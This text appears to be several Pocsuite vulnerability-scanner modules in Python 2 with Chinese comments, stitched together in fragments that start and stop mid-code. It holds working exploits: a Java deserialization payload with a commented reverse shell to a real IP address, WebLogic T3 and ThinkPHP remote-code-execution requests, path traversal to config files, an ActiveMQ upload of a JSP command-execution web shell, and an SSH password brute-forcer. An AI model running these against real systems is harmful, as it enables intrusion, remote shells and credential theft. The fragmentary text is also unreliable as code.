\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x51\x75\x65\x75\x65\x64\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x66\x55\xa8\x43\x75\x3f\x52\xe3\x02\x00\x01\x49\x00\x05\x73\x74\x61\x74\x65\x70\x78\x72\x00\x36\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x4f\x77\x6e\x61\x62\x6c\x65\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x33\xdf\xaf\xb9\xad\x6d\x6f\xa9\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x70\x70\x78\x74\x00\x08\x65\x6e\x74\x72\x79\x53\x65\x74\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x78\x71\x00\x7e\x00\x4f'
#print binascii.b2a_hex(payload_three).decode('hex')
try:
#执行的命令
payload_cmd = "whoami" #/bin/bash -i >& /dev/tcp/103.241.50.57/5210 0>&1
#转换为16进制
hex_tmp = payload_cmd.encode('hex')
#x代表16进制,02 表示不足两位,前面补0输出
length_hex = "%02x" % (len(hex_tmp) / 2)
#payload,数据包格式 jar包,长度,命令执行命令,jar包
send_payload = payload_one + length_hex + payload_cmd + payload_three
# print repr(send_payload)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (_host, int(_port))
#print '[*]connecting to %s port %s' % server_address
sock.connect(server_address)
print '[**]sending payload...'
sock.send(send_payload)
#print u"存在漏洞"
'''
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = send_payload
'''
#
data = sock.recv(512)
sock.close()
except Exception, e:
#print "error!"
result = {}
def host_port(self, vul_url):
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = "8080"
#组装 http, https会出现问题
vul_url = "http://" + _host + ":" + _port
return vul_url
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
import socket
socket.setdefaulttimeout(2)
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = 9200
payload = 'http://%s:%s/' % (_host, _port)
#检测漏洞
try:
print payload
response = requests.get(payload, timeout=2)
print response.status_code
if response.status_code == 200:
print "check content"
if response.content.find("You Know, for Search") >= 0:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = _host
result['VerifyInfo']['Payload'] = payload
# else:
# response = requests.get(payload.replace("9200","9207"),timeout=2)
# print reponse.status_code
# if response.status_code == 200:
# print "check content"
# if response.content.find("order") >= 0:
# result['VerifyInfo'] = {}
# result['VerifyInfo']['URL'] = _host
# result['VerifyInfo']['Payload'] = payload
except Exception, ex:
print ex
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = "6379"
import socket
payload = '\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
s = socket.socket()
socket.setdefaulttimeout(1)
#检测漏洞
try:
s.connect((_host, int(_port)))
s.send(payload)
recvdata = s.recv(1024)
#print recvdata
if recvdata and 'redis_version' in recvdata:
#print u'\n【警告】' + host + "【存在未授权访问】"
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = _host
result['VerifyInfo']['Payload'] = payload
else:
#print u'\n【不存在漏洞】 ' + host
pass
except:
# return host
pass
s.close()
print '[+]1 poc done'
return self.save_output(result)
def _verify(self):
result = {}
output = Output(self)
# ip
ip = url2ip(self.url)
#port
import re
_port = re.findall(':(\d+)\s*', self.url)
if len(_port) != 0:
_port = url2ip(self.url)[1]
else:
_port = 80
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect((ip, int(_port))) # ip port
flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"
sock.send(flag)
try:
data = sock.recv(1024)
if 'Requested Range Not Satisfiable' in data and 'Server: Microsoft' in data:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = ip
result['VerifyInfo']['Payload'] = ip + 'fastcgi read file vul'
return self.save_output(result)
except:
print '连接失败'
pass
sock.close()
# print '-' * 18 + '\n'
print data
def _verify(self):
#result是返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
# from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = "8080"
vul_ip = "http://%s:%s" % (_host, _port)
print vul_ip
try:
response1 = req.get(url=vul_ip + "/script", timeout=5)
response2 = req.get(url=vul_ip + "/ajaxBuildQueue", timeout=5)
if (response1.status_code == 200 and
"Jenkins.instance.pluginManager.plugins" in response1.text
and response2.status_code == 200):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
else:
response1 = req.get(url=vul_ip + "/jenkins/script", timeout=5)
response2 = req.get(url=vul_ip + "/jenkins/ajaxBuildQueue",
timeout=5)
if (response1.status_code == 200
and "Jenkins.instance.pluginManager.plugins"
in response1.text and response2.status_code == 200):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
except Exception, e:
response = ""
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = "2376"
payload = "http://" + _host + ":" + _port + "/info" #:2376/containers/json
#print payload
#检测漏洞
try:
#print u'\n【测试】' + host
recvdata = req.get(url=payload, timeout=5).content
#print recvdata
if recvdata and 'docker' in recvdata:
#print u'\n【警告】' + payload + "【存在未授权访问】"
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = payload
result['VerifyInfo']['Payload'] = recvdata
else:
#print u'\n【不存在漏洞】 ' + payload
pass
except:
# return payload
pass
print '[+]10 poc done'
return self.save_output(result)
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = "27017"
test_url = str("http://" + _host + ":" + _port)
#print vul_url
try:
response = req.get(url=test_url, timeout=5,
allow_redirects=False).content #禁止重定向
except Exception, e:
response = ""
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = 2181
payload = '\x65\x6e\x76\x69'
#检测漏洞
import socket
s = socket.socket()
socket.setdefaulttimeout(5)
try:
s.connect((_host, _port))
s.send(payload)
recvdata = s.recv(2048)
# print recvdata
if 'Environment' in recvdata:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload
except Exception as e:
# return host
print e
pass
s.close()
print '[+]27 poc done'
return self.save_output(result)
def _verify(self):
# 调用指纹方法
result = {}
#如果设置端口则取端口,没有设置则为默认端口
import re
import socket
import time
vul_url = "%s" % self.url
# from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = "7001"
vul_ip = "http://%s:%s" % (_host, _port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(75)
server_addr = (_host, int(_port))
t3_handshake(sock, server_addr)
build_t3_request_object(sock, int(_port))
#payload="aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707736000a556e6963617374526566000d3131382e38392e35332e3133390000044b000000006ebc92c000000000000000000000000000000078"
#payload=generate_payload()
payload = "aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707736000a556e6963617374526566000d3131382e38392e35332e3133390000044bffffffffe355c3aa00000000000000000000000000000078"
res = send_payload_objdata(sock, payload)
p = re.findall('\\$Proxy[0-9]+', res, re.S)
if (len(p) > 0):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = payload
return self.save_output(result)
def _verify(self):
result = {}
vul_url = '%s' % self.url
import re
import time
import ftplib
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = 80
vul_ip = "http://%s:%s" % (_host, _port)
#判断端口是否开放
import socket
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(1)
try:
sk.connect((_host, _port))
except Exception:
return self.save_output(result)
sk.close()
try:
url = vul_ip + "/member/index.php?a=doshow&m=include&c=old_thumb&dir=http/./.../..././/./.../..././/config/config_db.php"
a = req.get(url).text
if ("con_db_id" in a):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = _host
result['VerifyInfo']['Payload'] = url
except Exception as e:
pass
return self.save_output(result)
def _verify(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else :
_host = url2ip(vul_url)
_port = "8087"
vul_host = _host + ":" + _port
#print vul_host
try:
vul_result = self.poc(vul_host)
except Exception, e:
vul_result = False
def _verify(self):
result = {}
#获取漏洞url
#如果设置端口则取端口,没有设置则为默认端口
import re
vul_url = "%s" % self.url
# from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = "8080"
vul_ip = "http://%s:%s" % (_host, _port)
import hashlib
# 会话保持
output = Output(self)
file_name = "windows/win"
BACKDIR_COUNT = 8
header = {'Accept-Language': ('../' * BACKDIR_COUNT) + file_name}
try:
vulurl = vul_ip + '/plugin/credentials/.ini'
vulurltest = req.get(vulurl, headers=header)
if "MPEGVideo" in vulurltest.text:
if vulurltest.text.find('version'):
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = vulurl
result['VerifyInfo']['Payload'] = header
except Exception as e:
pass
return self.save_output(result)
def _verify(self):
# 调用指纹方法
result={}
#如果设置端口则取端口,没有设置则为默认端口
import re
import socket
import time
vul_url = "%s"%self.url
# from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = int(url2ip(vul_url)[1])
else :
_host = url2ip(vul_url)
_port = 80
#判断端口是否开放.
import socket
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(1)
try:
sk.connect((_host,_port))
#print 'Server port is OK!'
except Exception:
return self.save_output(result)
sk.close()
vul_ip = "http://%s:%s" % (_host, _port)
#url=vul_ip+"/public/index.php?s=captcha"
#data={"_method":"__construct","filter[]":"system","method":"get","server[REQUEST_METHOD]":"ping%20t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org"}
head={"Content-Type":"application/x-www-form-urlencoded"}
url1 = vul_ip+"/public/index.php"
#url1= "http://127.0.0.1/thinkphp/thinkphp_5.0.10_full/public/index.php"
#data1 = {"c":"printf","f":"1234567890","_method":"filter"}
data1 = {"c":"printf","f":"1234567890","_method":"filter"}
try:
text = requests.post(url=url1,data=data1,timeout=4).text
if ("printf1234567890filter" in text or "printffilter1234567890" in text or "1234567890filterprintf" in text or "1234567890printffilter" in text or "filterprintf1234567890" in text or "filter1234567890printf" in text) :
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url1
result['VerifyInfo']['Payload'] = data1
return self.save_output(result)
except Exception as e:
pass
url2 = vul_ip+"/index.php"
data2 = {"c":"printf","f":"1234567890","method":"filter"}
try:
text = req.post(url2,data=data2,timeout=4).text
if ("printf1234567890filter" in text or "printffilter1234567890" in text or "1234567890filterprintf" in text or "1234567890printffilter" in text or "filterprintf1234567890" in text or "filter1234567890printf" in text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = p
return self.save_output(result)
except Exception as e:
pass
url3 = vul_ip+"/public/index.php?s=captcha"
data3 = {"_method":"__construct","filter[]":"system","method":"get","get[]":"more index.php"}
try:
text = req.post(url3,data=data3,timeout=4).text
if ("thinkphp/start.php" in text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = p
return self.save_output(result)
except Exception as e:
pass
url4 = vul_ip+"/index.php?s=captcha"
data4 = {"_method":"__construct","filter[]":"system","method":"get","get[]":"more index.php"}
try:
text = req.post(url4,data=data4,timeout=4).text
if ("thinkphp/start.php" in text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = p
return self.save_output(result)
except Exception as e:
pass
url5 = vul_ip+"/public/index.php"
data5 = {"_method":"__construct","filter[]":"system","server[REQUEST_METHOD]":"more index.php"}
try:
text = req.post(url5,data=data5,timeout=4).text
if ("thinkphp/start.php" in text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = p
return self.save_output(result)
except Exception as e:
pass
url6 = vul_ip+"/index.php"
data6 = {"_method":"__construct","filter[]":"system","server[REQUEST_METHOD]":"more index.php"}
try:
text = req.post(url6,data=data6,timeout=4).text
if ("thinkphp/start.php" in text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = p
return self.save_output(result)
except Exception as e:
pass
return self.save_output(result)
def _attack(self):
#定义返回结果
result = {}
#获取漏洞url
vul_url = '%s' % self.url
#如果设置端口则取端口,没有设置则为默认端口
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = '8161'
#检测漏洞
url = 'http://%s:%s' % (_host, _port)
# print url
try:
get_fileserver_path_url = url + '/fileserver/%08/..%08/.%08/%08'
res = req.put(url=get_fileserver_path_url,
timeout=5,
allow_redirects=False)
# print res.reason
path = re.findall(r'/.*?(?=fileserver/.*)', res.reason)[0]
# print path
put_jsp_url = url + '/fileserver/haha.jsp'
jsp_data = '''
<%
if("sec".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
'''
res = req.put(url=put_jsp_url,
timeout=5,
allow_redirects=False,
data=jsp_data)
if res.status_code == 204:
# print 'ok'
headers = {'Destination': 'file://' + path + 'admin/haha.jsp'}
res = req.request('move',
url=put_jsp_url,
timeout=5,
allow_redirects=False,
headers=headers)
if res.status_code == 204:
# print 'ok'
exploit_url = url + '/admin/haha.jsp?pwd=sec&i=id'
res = req.get(url=exploit_url,
timeout=5,
allow_redirects=False)
if 'uid' in res.text:
id_info = re.findall(r'(?<=<pre>).*', res.text)[0]
print id_info
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = exploit_url
except Exception as e:
print e
return self.save_output(result)
def _verify(self):
result = {}
vul_url = '%s' % self.url
import re
import time
import paramiko
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = int(url2ip(vul_url)[1])
else:
_host = url2ip(vul_url)
_port = 22
#判断端口是否开放
import socket
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(1)
try:
sk.connect((_host, _port))
#print 'Server port is OK!'
except Exception:
return self.save_output(result)
sk.close()
flag = False
payload = "弱口令"
username = [
"root",
"admin",
]
password = [
"", "toor", "1234", "123456", "admin", "Admin", "ADMIN",
"admin123", "Admin123", "root", "root123", "123.com"
'123456', 'admin', 'root', 'password', '123123', '123', '1', '',
'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#',
'123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou',
'000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123',
'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd',
'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t',
'system', '111111', 'admin', "1", "toor", "1234", "123456",
"admin", "Admin", "ADMIN", "admin123", "Admin123", "root",
"root123", "123.com", "ct123!@#"
]
for u in username:
for p in password:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
print p
ssh.connect(hostname=_host,
port=_port,
username=u,
password=p,
timeout=1,
allow_agent=False,
look_for_keys=False)
#执行命令
stdin, stdout, stderr = ssh.exec_command('whoami',
timeout=1)
#获取命令结果
resultname = stdout.read().split("\n")[0]
if resultname == u:
payload += str(u) + ":" + str(p)
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = _host
result['VerifyInfo']['Payload'] = payload
ssh.close()
except Exception, ex:
ssh.close()
